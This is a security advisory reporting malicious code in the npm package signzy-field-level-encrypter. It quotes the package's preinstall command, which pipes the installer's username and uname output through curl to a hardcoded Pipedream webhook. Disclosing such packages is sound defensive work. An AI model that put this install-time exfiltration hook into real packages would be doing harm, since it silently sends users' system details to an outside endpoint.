MAL-2026-10972
Malicious code in signzy-field-level-encrypter (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (38314f87203a0860a07c13fed06e2ec374545060b18be84a2d125556b93bc451) package.json declares a preinstall lifecycle script that runs `echo "$(whoami): $(uname -a)" | curl -X POST` against a hardcoded Pipedream webhook at https://eob8pyiw2d4hxvk.m.pipedream.net. On `npm install`, the installer's OS username and kernel/architecture/hostname fingerprint are captured and transmitted to an author-controlled endpoint without consent or opt-out. The destination is a generic Pipedream request-bin, not infrastructure related to any legitimate field-level-encryption purpose the package name implies.
## Source: ossf-package-analysis (1620206c32062d89cd35aa65951fb139a004cf78c5d1b0b6eae1e7fb7378238e) The OpenSSF Package Analysis project identified 'signzy-field-level-encrypter' @ 12.9.13 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- The package executes one or more commands associated with malicious behavior.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for signzy-field-level-encrypter (npm). Pin to a known-safe version or switch to an alternative.